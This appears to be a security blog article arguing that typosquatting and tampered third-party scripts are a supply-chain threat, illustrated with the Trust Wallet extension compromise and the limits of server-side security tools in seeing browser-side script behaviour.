Skip to content

Typosquatting Is Not a User Problem—It’s a Supply Chain Threat

The point: Typosquatting is no longer a user problem but a supply chain threat. AI-generated lookalike domains hide in third-party scripts and are not detected by standard security stacks. The Trust Wallet attack shows: 8.5 million dollars gone in 48 hours – without warning.

AI-generated lookalike domains are now embedded in third-party scripts running on websites. The Trust Wallet attack with 8.5 million dollars in damages demonstrates why classical security stacks fail to detect them and which measures are actually necessary.

Typosquatting has fundamentally changed. It is no longer about typographical errors in URLs but about manipulated third-party scripts executed in legitimate applications. Large language models generate thousands of convincingly crafted domain variants in minutes. Homograph attacks using Latin, Cyrillic and Greek characters blur the line between real and fake domains.

The Trust Wallet case reveals the reality: A worm named Shai-Hulud gathered developer credentials over months. With stolen GitHub tokens and npm publishing keys, a trojaned version of the Trust Wallet extension was distributed via official channels—it even passed Chrome’s verification. The malware silently extracted seed phrases and transmitted them to a server disguised as an analytics endpoint belonging to the attacker. Within 48 hours, 2,500 wallets were emptied. Total damage: 8.5 million dollars.

The core problem: Firewalls, WAFs, EDR and Content Security Policies have no visibility into browser execution. They do not observe what validated scripts actually do after loading. Typical e-commerce sites load 40–60 third-party scripts—each a potential attack vector.

The distinction between payment data and cryptocurrencies is meaningless. The attack methodology remains identical: A trusted program loaded by the browser is modified to intercept sensitive data—completely invisible to server logs and classical security stacks. These controls are not misconfigured; they were simply not designed for browser observability.

Share on: